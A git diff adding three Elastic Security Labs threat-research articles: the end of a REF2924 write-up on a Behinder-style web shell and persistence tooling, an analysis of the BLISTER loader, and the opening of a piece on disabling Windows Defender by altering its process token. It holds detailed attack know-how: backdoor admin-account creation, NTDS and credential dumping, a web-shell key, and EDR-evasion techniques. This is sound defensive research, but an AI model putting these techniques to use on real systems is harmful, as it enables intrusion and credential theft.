Elastic Security Labs observed the Microsoft .NET compiler ( `csc.exe` ) being used to compile a DLL file,. The output was identified by [Elastic Defend](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) as a malicious file. Analysts who may have observed dynamic runtime compilation of .NET web shells should note that this was performed by the operator, not automatically by the system.\n\n\n\nThe resulting output file was named `App_Web_lgntop.aspx.ec688436.pkx46see.dll` (a50ca8df4181918fe0636272f31e19815f1b97cce6d871e15e03b0ee0e3da17b) and was the subject of malware analysis.\n\n#### Analysis\n\nThe web shell requires a small amount of pre-configuration to ensure it listens for the correct URI. In this case the path will be \" `~/auth/Current/themes/resources/lgntop.aspx`\".\n\n\n\nThis path is expected on Microsoft Exchange Outlook Web Access (OWA) sites, so it was likely selected to blend in with the OWA service that is running on the target server. Once a web request is received it is processed by the following method.\n\n\n\nThis method checks if a specific HTTP header named `XFF` is present in the request headers. If it is present and its value, after passing through an MD5 hash function and a substring function, matches the string \" `19267E61029B4546`\", then the method proceeds to execute the rest of the code. The string is likely used as an authentication key to prevent others from using the webshell.\n\nWithin the `if` statement, the method reads the binary data from the request body using the `BinaryRead` method and stores it in a byte array. It then creates a string containing the fully qualified name of a .NET type that the code wants to load and gets a reference to that type using the `Type.GetType` method. The byte array in the image is the ASCII code representation of the text “ `System.Reflection.Assembly` ”. This way of presenting the code is done in order to avoid string-based detection. The `System.Reflection.Assembly` class provides methods and properties to load, examine, and manipulate assemblies at runtime.\n\nThe code obtains a reference to a method named `Load` in the loaded type and invokes it using the `Invoke` method. The `Load` method takes a byte array as a parameter, which the code decrypts using a `Decrypt` method (not shown in this publication). The result of the `Load` method invocation is stored in an object variable.\n\nThe code then gets a reference to another method named `CreateInstance` in the loaded type and invokes it using the `Invoke` method. The `CreateInstance` method takes a string as a parameter, which the code constructs from a byte array containing the ASCII codes for the string U. The result of the `CreateInstance` method invocation is stored in an object variable.\n\nFinally, the code calls the `Equals` method on the object, passing in the current object. Because `Equals` will call `GetType` on the object, this approach is a way to indirectly call functions covertly.\n\nThe `Encrypt` and `Decrypt` functions include a hard-coded key.\n\n\n\n#### Sources\n\nThe key \" `e45e329feb5d925b`\" is the result of taking the first half of the MD5 hash of the string \"rebeyond\". The string “rebeyond” refers to the developer of the Behinder web shell framework. This refers to the developer of the [Behinder](https://github.com/rebeyond/Behinder) webshell framework. This key is also the default value when you generate a shell template using the Behinder or derivative [Godzilla](https://github.com/BeichenDream/Godzilla) webshell frameworks.\n\n### Persistence module\n\nOn February 13, 2023, we observed a new persistent malware called `kavUpdate.exe` written in .NET with an exceptionally small footprint (about 6Kb compiled). We believe this software was developed specifically for this environment by the threat. Elastic Security Labs observed this binary persisting via a Scheduled Task, though other mechanisms would likely be compatible.\n\n#### Analysis\n\n\n\nThis code is designed with the sole purpose of executing a set of predefined commands. The malware checks the current day and hour, and if it is Monday or Thursday at 5am, it will execute a series of commands:\n\n1. Delete the user 'norshasa'\n2. Add the user 'norshasa' with the password '[P@ssw0rd123](mailto:P@ssw0rd123)...'\n3. Activate the user 'norshasa'\n4. Add the user 'norshasa' to the Domain Admins group\n5. Add the user 'norshasa' to the Remote Desktop Users group\n6. Create a [full backup of NTDS]() in the `C:\\ProgramData\\temp` folder\n7. On the same days of the week, one hour later at 6am, delete the user 'norshasa.'\n\n### Open source tools\n\nOn January 2nd, 2023 the threat deployed [TFirewall](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) in the victim's environment. TFirewall is a testing tool designed to evaluate whether hosts can establish a SOCKS5 proxy within an intranet environment while allowing for outbound network communication through specific ports. Developed using Golang, TFirewall is comprised of a client and server component and is compatible with multiple operating systems.\n\nAlong with TFirewall, we observed that the attacker used the free tool [AdFind](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image1.png). `AdFind` is a command line utility for querying Active Directory and other directory services. AdFind can be run on Windows 7 or newer and requires no special security permissions beyond the ability to launch executables. It’s written in C++ and compiled with Visual Studio 2022. The source code is not available.\n\nThe binary is [quickly identifiable](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) based on its hash (114b37df703d46a44de0bc96afab8b8590e59a3c389558dd531298e5dd275acb). During execution, we recognized the use of AdFind-specific command line flags and parameters:\n\n\n\nOn March 6th, 2023 we observed a process named `nat.exe`. Initially, the file was only identified as generically malicious. However, if we take a closer look at the command line parameters that are used during execution, we have a hint for which tool the attacker is using.\n\n\n\nBased on these arguments, we can safely conclude it's a packed version of the Impacket tool [secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). Impacket contains a collection of Python classes for working with network protocols. Impacket is commonly used to carry out a variety of tasks related to network security and penetration testing, though it may also be abused by threat actors.\n\nUsing the same approach (examining the command line parameters), we identified the use of the tool called [NTDSDumpEx](https://github.com/zcgonvh/NTDSDumpEx) which exhibited the same command line arguments employed by this tool:\n\n\n\n`NTDSDumpEx` is capable of extracting data from the Active Directory NTDS.dit database in its offline state, meaning the database does not have to be running. It can extract information such as user accounts, group memberships, access control lists, and other directory objects.\n\n### Background\n\nThroughout the attack we witnessed a combination of TTPs that provide a recognizable fingerprint. For example, the way the attacker exported mailboxes is described in detail in [this](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6) blog post. We also see a strong resemblance in the way credentials from LSASS are being exported, as described [here](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8Elsass.exe%E8%BF%9B%E7%A8%8B%E5%AF%BC%E5%87%BA%E5%87%AD%E6%8D%AE). The majority of the commands and tools deployed by the attacker are well described on the same GitHub users’ [tips](https://github.com/3gstudent/Pentest-and-Development-Tips) repository.\n\nWe also note that the technique used to deploy NAPLISTENER is described [here](https://3gstudent.github.io/%E5%88%A9%E7%94%A8IIS%E7%9A%84%E7%AB%AF%E5%8F%A3%E5%85%B1%E4%BA%AB%E5%8A%9F%E8%83%BD%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99) and the deployment method for malicious IIS modules like DOORME can be found in [this](https://3gstudent.github.io/%E5%88%A9%E7%94%A8IIS%E7%9A%84%E6%A8%A1%E5%9D%97%E5%8A%9F%E8%83%BD%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99) blog post. And lastly, a [post](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%90%8E%E9%97%A8%E7%9A%84%E6%89%A9%E5%B1%95) on Godzilla and Behinder web shells in exchange servers closely reflects how these capabilities were implemented within targeted environments.\n\nDuring malware analysis of the SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD families, we also identified open source repositories that minimally served as the inspiration for these payloads and which have been described in other publications from Elastic Security Labs.\n\nWe conclude that the attackers are at the very least regular consumers of blogs and open source repositories, both of which have contributed to the rapid pace of this threat’s activities.\n\n### Detection logic\n\nThe following prebuilt protections are available from Elastic: - [AdFind Command Activity](https://www.elastic.co/guide/en/security/current/adfind-command-activity.html)\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the Behinder web shell.\n\n`rule Windows_Trojan_Behinder {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-03-02\"\n last_modified = \"2023-03-02\"\n description = \"Web shell found in REF2924, related to Behinder or Godzilla\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Behinder\"\n threat_name = \"Windows.Trojan.Behinder\"\n License = “Elastic License v2”\n reference_sample = \"a50ca8df4181918fe0636272f31e19815f1b97cce6d871e15e03b0ee0e3da17b\"\n strings:\n $load = { 53 79 73 74 65 6D 2E 52 65 66 6C 65 63 74 69 6F 6E 2E 41 73 73 65 6D 62 6C 79 }\n $key = \"e45e329feb5d925b\" ascii wide\n condition:\n all of them\n}`\n"
+ },
+ "title": "REF2924: how to maintain persistence as an (advanced?) threat",
+ "slug": "ref2924-howto-maintain-persistence-as-an-advanced-threat",
+ "date": "2023-03-27",
+ "description": "Elastic Security Labs describes new persistence techniques used by the group behind SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD.",
+ "author": [
+ {
+ "slug": "remco-sprooten"
+ }
+ ],
+ "image": "blog-thumb-pink-grapefruit-outlier.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref2924",
+ "siestagraph",
+ "naplistener",
+ "somnirecord"
+ ]
+ },
+ "id": "security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md.json
new file mode 100644
index 00000000000..2e74e8b7ea7
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Revisiting BLISTER: New development of the BLISTER loader\"\nslug: \"revisiting-blister-new-developments-of-the-blister-loader\"\ndate: \"2023-08-24\"\ndescription: \"Elastic Security Labs dives deep into the recent evolution of the BLISTER loader malware family.\"\nauthor:\n - slug: salim-bitam\n - slug: daniel-stepanic\nimage: \"cracked-lava.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - blister\n - malware\n - ref7890\n---\n\n## Preamble\n\nIn a fast-paced and ever-changing world of cybercrime threats, the tenacity and adaptability of malicious actors is a significant concern. BLISTER, a malware loader initially [discovered](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign) by Elastic Security Labs in 2021 and associated with financially-motivated intrusions, is a testament to this trend as it continues to develop additional capabilities. Two years after its initial discovery, BLISTER continues to receive updates while flying under the radar, gaining momentum as an emerging threat. Recent findings from Palo Alto’s [Unit 42](https://twitter.com/Unit42_Intel/status/1684583246032506880) describe an updated [SOCGHOLISH](https://redcanary.com/threat-detection-report/threats/socgholish/) infection chain used to distribute BLISTER and deploy a payload from [MYTHIC](https://github.com/its-a-feature/Mythic), an open-source Command and Control (C2) framework.\n\n## Key takeaways\n\n - Elastic Security Labs has been monitoring malware loader BLISTER ramping up with new changes, and ongoing development with signs of imminent threat activity\n - New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments\n - BLISTER now integrates techniques to remove any process instrumentation hook and has modified its configuration with multiple revisions, now encompassing additional fields and flags.\n\n## Overview\n\nOur research uncovered new functionality that was previously absent within the BLISTER family, indicating ongoing development. However, the malware authors continue to use a distinctive technique of embedding malicious code in otherwise legitimate applications. This approach superficially appears successful, given the low rates of detection for many vendors as seen in VirusTotal. The significant amount of benign code and use of encryption to protect the malicious code are likely two factors impacting detection.\n\n\n\nRecently, Elastic Security Labs has observed many new BLISTER loaders in the wild. After analyzing various samples, it’s clear that the malware authors have made some changes and have been watching the antivirus industry closely. In one [sample](https://www.virustotal.com/gui/file/b4f37f13a7e9c56ea95fa3792e11404eb3bdb878734f1ca394ceed344d22858f) from early June, we can infer that the authors were testing with a non-production loader that displays a Message Box displaying the strings “Test”.\n\n\n\nReaders can see a disassembled view of this functionality below.\n\n\n\nBy the end of July, we observed campaigns involving a new BLISTER loader that targeted victim organizations to deploy the MYTHIC implant.\n\n\n\nAt the time of this writing, Elastic Security Labs is seeing a stream of BLISTER samples which deploy MYTHIC and have very low rates of detection. \n\n\n\n## Comparative analyses\n\n### Smuggling malicious code\n\nThe authors behind BLISTER employ a consistent strategy of embedding BLISTER's malicious code within a legitimate library. The most recent variants of this loader have targeted the [VLC](https://www.videolan.org/vlc/) Media Player library to smuggle their malware into victim environments. This blend of benign and malicious code seems effective at defeating some kinds of machine-learning models.\n\n\n\nThe following is a comparison between a legitimate VLC DLL and one that is infected with BLISTER’s code. In the infected sample, the entry point that references malicious code has been indicated in red. This methodology is similar to prior BLISTER variants.\n\n\n\n### Different hashing algorithm\n\nOne of the changes implemented since our last [write-up](https://www.elastic.co/security-labs/blister-loader) is the adoption of a different hashing algorithm used in the core and in the loader part of BLISTER. While the previous version used simple logic to shift bytes, this new version includes a hard-coded seed with XOR and multiplication operations. Researchers speculate that changing the hashing approach helps to evade antimalware products that rely on YARA signatures.\n\n\n\n### Configuration retrieval\n\nFollowing the decryption of malicious code by the BLISTER’d loader, it employs an identical memory scanning method to identify the configuration data blob. This is accomplished by searching for a predetermined, hardcoded memory pattern. A notable contrast from the earlier iteration of BLISTER lies in the fact that the configuration is now decrypted in conjunction with the core code, rather than being treated as a separate entity.\n\n### Environmental keying\n\nA recent addition to BLISTER is the capability to exclusively execute on designated machines. This behavior is activated by configuring the appropriate flag within the malware’s configuration. Subsequently, the malware proceeds to extract the machine's domain name using the `GetComputerNameExW` Windows API. Following this, the domain name is hashed using the previously mentioned algorithm, and the resulting hash is then compared to a hash present in the configuration. This functionality is presumably deployed for the purpose of targeted attacks or for testing scenarios, ensuring that the malware refrains from infecting unintended systems such as those employed by malware researchers.\n\n\n\nOne of the few malware analysis tools capable of quickly exposing this behavior is the awesome [Tiny Tracer](https://github.com/hasherezade/tiny_tracer) utility by [hasherezade](https://twitter.com/hasherezade). We’ve included an excerpt from Tiny_Tracer below which captures the BLISTER process immediately terminating after the `GetComputerNameExW` validation is performed in a sandboxed analysis VM.\n\n\n\n### Time-based anti-debugging feature\n\nSimilar to its predecessors, the malware incorporates a time-based anti-debugging functionality. However, unlike the previous versions in which the timer was hardcoded, the updated version introduces a new field in the configuration. This field enables the customization of the sleep timer, with a default value of 10 minutes. This default interval remains unchanged from prior iterations of BLISTER.\n\n\n\n### Unhook process instrumentation to detect syscalls\n\nIn this latest version, BLISTER introduces noteworthy functionality: it unhooks any ongoing process instrumentation, a [tactic](https://github.com/ionescu007/HookingNirvana/blob/master/Esoteric%20Hooks.pdf) designed to circumvent userland syscall detection mechanisms upon which certain EDR solutions are based.\n\n\n\n### BLISTER's configuration\n\nThe BLISTER configuration structure has also been changed with the latest variants. Two new fields have been added and the flag field at offset 0 has been changed from a WORD to a DWORD value. The new fields pertain to the hash of the domain for environmental keying and the configurable sleep time; these field values are at offset 4 and 12 respectively. The following is the updated structure of the configuration:\n\n\n\nChanges have also been made to the configuration flags, allowing the operator to activate different functions within the malware. Researchers have provided an updated list of functions built upon our prior research into BLISTER.\n\n\n\n## Payload extractor update\n\nIn our previous research publication, we introduced an efficient payload extractor tailored to dissect and extract the configuration and payload of the loader. To dissect the most recent BLISTER variants and capture these new details, we enhanced our extractor which is available [here](https://github.com/elastic/labs-releases/tree/main/tools/blister).\n\n\n\n## Conclusion\n\n[BLISTER](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html) is one small part of the global cybercriminal ecosystem, providing financially-motivated threats to gain access to victim environments and avoid detection by security sensors. The community should consider these new developments and assess the efficacy of BLISTER detections, Elastic Security Labs will continue to monitor this threat and share actionable guidance.\n\n## Detection logic\n\n### Prevention\n\n - [Windows.Trojan.Blister](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Blister.yar)\n \n ### Detection\n \n - [Windows Error Manager/Reporting Masquerading](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_windows_error_manager_reporting_masquerading.toml)\n - [Potential Operation via Direct Syscall](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_operation_via_direct_syscall.toml)\n - [Potential Masquerading as Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml)\n - [Unusual Startup Shell Folder Modification](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml)\n - [Potential Masquerading as VLC DLL](https://github.com/elastic/detection-rules/blob/ef432d0907548abf7699fa5d86150dc6b4133125/rules_building_block/defense_evasion_masquerading_vlc_dll.toml)\n\n### YARA\n\nElastic Security has created [YARA rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Blister.yar) to identify this activity. Below is the latest rule that captures the new update to BLISTER.\n\n```yara\nrule Windows_Trojan_Blister {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-08-02\"\n last_modified = \"2023-08-08\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Blister\"\n threat_name = \"Windows.Trojan.Blister\"\n license = \"Elastic License v2\"\n strings:\n $b_loader_xor = { 48 8B C3 49 03 DC 83 E0 03 8A 44 05 48 [2-3] ?? 03 ?? 4D 2B ?? 75 }\n $b_loader_virtual_protect = { 48 8D 45 50 41 ?? ?? ?? ?? 00 4C 8D ?? 04 4C 89 ?? ?? 41 B9 04 00 00 00 4C 89 ?? F0 4C 8D 45 58 48 89 44 24 20 48 8D 55 F0 }\n condition:\n all of them\n}\n```\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n - [Persistence](https://attack.mitre.org/tactics/TA0003/)\n\n## Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [System Binary Proxy Execution: Rundll32](https://attack.mitre.org/techniques/T1218/011/)\n - [Execution Guardrails: Environmental Keying](https://attack.mitre.org/techniques/T1480/001/)\n - [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)\n - [Masquerading](https://attack.mitre.org/techniques/T1036/)\n - [Process Injection: Process Hollowing](https://attack.mitre.org/techniques/T1055/012/)\n\n## References\n\nThe following were referenced throughout the above research:\n - [Palo Alto Unit42](https://twitter.com/Unit42_Intel/status/1684583246032506880?s=20)\n - [Trendmicro](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html)\n - [Malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.blister)\n\n## Observables\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/blister) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Indicator | Type | Reference |\n|-----------|------|-----------|\n| 5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395db | sha256 | BLISTER loader DLL |\n"
+ },
+ "title": "Revisiting BLISTER: New development of the BLISTER loader",
+ "slug": "revisiting-blister-new-developments-of-the-blister-loader",
+ "date": "2023-08-24",
+ "description": "Elastic Security Labs dives deep into the recent evolution of the BLISTER loader malware family.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "cracked-lava.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "blister",
+ "malware",
+ "ref7890"
+ ]
+ },
+ "id": "security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sandboxing_antimalware_products-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sandboxing_antimalware_products-md.json
new file mode 100644
index 00000000000..cd427dd779a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sandboxing_antimalware_products-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Sandboxing Antimalware Products for Fun and Profit\"\nslug: \"sandboxing-antimalware-products\"\ndate: \"2023-02-21\"\ndescription: \"This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.\"\nauthor:\n - slug: gabriel-landau\nimage: \"blog-thumb-tools-various.jpg\"\ncategory:\n - slug: security-research\n---\n\nThis article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack. This is of particular interest because we build and maintain two anti-malware products that benefit from this protection.\n\n## Protected Anti-Malware Services\n\nWindows 8.1 [introduced](https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-) a concept of Protected Antimalware Services. This enables specially-signed programs to run such that they are immune from tampering and termination, even by administrative users. Microsoft’s documentation ([archived](https://web.archive.org/web/20211019010629/https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-)) describes this as:\n\n> In Windows 8.1, a new concept of protected service has been introduced to allow anti-malware user-mode services to be launched as a protected service. After the service is launched as protected, Windows uses code integrity to only allow trusted code to load into the protected service. Windows also protects these processes from code injection and other attacks from admin processes.\n\nThe goal is to prevent malware from instantly disabling your antivirus and then running amok. For the rest of this article, we call them Protected Process Light (PPL). For more depth, [Alex Ionescu](https://twitter.com/aionescu) goes into great detail on protected processes in his [talk at NoSuchCon 2014](https://www.youtube.com/watch?v=35L_qJNMu1A).\n\nTo be able to run as a PPL, an anti-malware vendor must apply to Microsoft, prove their identity, sign binding legal documents, implement an [Early Launch Anti-Malware](https://docs.microsoft.com/en-us/windows/win32/w8cookbook/secured-boot) (ELAM) driver, run it through a test suite, and submit it to Microsoft for a special Authenticode signature. It is not a trivial process. Once this process is complete, the vendor can [use this ELAM driver](https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-installelamcertificateinfo) to have Windows protect their anti-malware service by running it as a PPL.\n\nYou can see PPL in action yourself by running the following from an elevated administrative command prompt on a default Windows 10 install:\n\n**Protected Process Light in Action**\n\n```\nC:\\WINDOWS\\system32>whoami\nnt authority\\system\n\nC:\\WINDOWS\\system32>whoami /priv | findstr \"Debug\"\nSeDebugPrivilege Debug programs Enabled\n\nC:\\WINDOWS\\system32>taskkill /f /im MsMpEng.exe\nERROR: The process \"MsMpEng.exe\" with PID 2236 could not be terminated.\nReason: Access is denied.\n\n```\n\nAs you can see here, even a user running as SYSTEM (or an elevated administrator) with [SeDebugPrivilege](https://devblogs.microsoft.com/oldnewthing/20080314-00/?p=23113) cannot terminate the PPL Windows Defender anti-malware Service (MsMpEng.exe). This is because non-PPL processes like taskkill.exe cannot obtain handles with the PROCESS_TERMINATE access right to PPL processes using APIs such as [OpenProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess).\n\nIn summary, Windows attempts to protect PPL processes from non-PPL processes, even those with administrative rights. This is both documented and implemented. That being said, with PROCESS_TERMINATE blocked, let’s see if there are other ways we can interfere with it instead.\n\n## Windows Tokens\n\nA Windows token can be thought of as a security credential. It says who you are and what you’re allowed to do. Typically when a user runs a process, that process runs with their token and can do anything the user can do. Some of the most important data within a token include:\n\n- User identity\n- Group membership (e.g. Administrators)\n- Privileges (e.g. SeDebugPrivilege)\n- Integrity level\n\nTokens are a critical part of Windows authorization. Any time a Windows thread accesses a [securable object](https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects), the OS performs a security check. It compares the thread’s effective token against the [security descriptor](https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptors) of the object being accessed. You can read more about tokens in the Microsoft [access token documentation](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens) and the Elastic blog post that [introduces Windows tokens](https://www.elastic.co/blog/introduction-to-windows-tokens-for-security-practitioners).\n\n### Sandboxing Tokens\n\nSome applications, such as web browsers, have been repeated targets of exploitation. Once an attacker successfully exploits a browser process, the exploit payload can perform any action that the browser process can perform. This is because it shares the browser’s token.\n\nTo mitigate the damage from such attacks, web browsers have moved much of their code into lower-privilege worker processes. This is typically done by creating a restricted security context called a sandbox. When a sandboxed worker needs to perform a privileged action on the system, such as saving a downloaded file, it can ask a non-sandboxed “broker” process to perform the action on its behalf. If the sandboxed process is exploited, the goal is to limit the payload’s ability to cause harm to only resources accessible by the sandbox.\n\nWhile modern sandboxing involves several components of OS security, one of the most important is a low-privilege, or restricted, token. New sandbox tokens can be created with APIs such as\n\n[CreateRestrictedToken](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-createrestrictedtoken)\n. Sometimes a sandboxed process needs to lock itself down after performing some initialization. The\n[AdjustTokenPrivileges](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges)\nand\n[AdjustTokenGroups](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups)\nAPIs allow this adjustment. These APIs enable privileges and groups to be “forfeit” from an existing process’s token in such a way that they cannot be restored without creating a new token outside the sandbox.\n\nOne [commonly used sandbox](https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox.md) today is part of Google Chrome. Even some [security products](https://www.microsoft.com/security/blog/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/) are getting into sandboxing these days.\n\n### Accessing Tokens\n\nWindows provides the [OpenProcessToken](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken)API to enable interaction with process tokens. MSDN states that one must have the PROCESS_QUERY_INFORMATION right to use OpenProcessToken. Since a non-protected process can only get PROCESS_QUERY_LIMITED_INFORMATION access to a PPL process (note the LIMITED), it is seemingly impossible to get a handle to a PPL process’s token. However, MSDN is incorrect in this case. With only PROCESS_QUERY_LIMITED_INFORMATION, we can successfully open the token of a protected process. [James Forshaw](https://twitter.com/tiraniddo)explains this documentation discrepancy in more depth, showing the underlying\n\n[de-compiled kernel code](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html).\n\nTokens are themselves securable objects. As such, regular access checks still apply. The effective token of the thread attempting to access the token is checked against the security descriptor of the token being accessed for the requested access rights (TOKEN_QUERY, TOKEN_WRITE, TOKEN_IMPERSONATE, etc). For more detail about access checks, see the Microsoft article, “[How Access Checks Work](https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object).”\n\n## The Attack\n\n[Process Hacker](https://github.com/processhacker/processhacker/releases/tag/v2.39) provides a nice visualization of token security descriptors. Taking a look at Windows Defender’s (MsMpEng.exe) token, we see the following Discretionary Access Control List (DACL):\n\n\n\nNote that the SYSTEM user has full control over the token. This means, unless some other mechanism is protecting the token, a thread [running as SYSTEM](https://powersploit.readthedocs.io/en/latest/Privesc/Get-System/) can modify the token. When such modification is possible, it violates the desired “PPL is protected from administrators” design goal.\n\n### Demo\n\nAlas, there is no other mechanism protecting the token. Using this technique, an attacker can forcefully remove all privileges from the MsMpEng.exe token and reduce it from [system to untrusted integrity](https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control). Being nerfed to untrusted integrity prevents the victim process from accessing most securable resources on the system, quietly incapacitating the process without terminating it.\n\n\n\nIn this video, the attacker could have further restricted the token, but the privilege and integrity changes were sufficient to prevent MsMpEng.exe from detecting and blocking a Mimikatz execution. We felt this illustrated a valid proof of concept.\n\n## Defense\n\nNewer versions of Windows include an undocumented feature called “trust labels.” Trust labels are part of the [System Access Control List](https://docs.microsoft.com/en-us/windows/win32/ad/retrieving-an-objectampaposs-sacl) (SACL), an optional component of every security descriptor. Trust labels allow Windows to restrict specific access rights to certain types of protected processes. For example, Windows [protects](https://www.elastic.co/blog/protecting-windows-protected-processes) the \\KnownDlls object directory from [modification by malicious administrators](https://www.elastic.co/blog/detect-block-unknown-knowndlls-windows-acl-hardening-attacks-cache-poisoning-escalation) using a trust label. We can see this with [WinObjEx64](https://github.com/hfiref0x/WinObjEx64):\n\n\n\nLike \\KnownDlls, tokens are securable objects, and thus it is possible to protect them against modification by malicious administrators. Elastic Security does this, in fact, and is immune to this attack, by denying TOKEN_WRITE access to processes with a trust label below “Anti-Malware Light.” Because this protection is applied at runtime, however, there is still a brief window of vulnerability until it can apply the trust label.\n\nIdeally, Windows would apply such a trust label to each PPL process’s token as it is created. This would eliminate the race condition and fix the vulnerability in the PPL mechanism. There is precedent. With a kernel debugger, we can see that Windows is already protecting the System process’ token on Windows (21H1 shown below) with a trust label:\n\n```\n1: kd> dx -r1 (((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER)) & ~0xf))->SecurityDescriptor & ~0xf)\n(((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER)) & ~0xf))->SecurityDescriptor & ~0xf) : 0xffffe00649c46c20\n1: kd> !sd 0xffffe00649c46c20\n->Revision: 0x1\n->Sbz1 : 0x0\n->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n->Owner : S-1-5-32-544\n->Group : S-1-5-32-544\n->Dacl :\n->Dacl : ->AclRevision: 0x2\n->Dacl : ->Sbz1 : 0x0\n->Dacl : ->AclSize : 0x1c\n->Dacl : ->AceCount : 0x1\n->Dacl : ->Sbz2 : 0x0\n->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n->Dacl : ->Ace[0]: ->AceFlags: 0x0\n->Dacl : ->Ace[0]: ->AceSize: 0x14\n->Dacl : ->Ace[0]: ->Mask : 0x000f01ff\n->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n->Sacl :\n->Sacl : 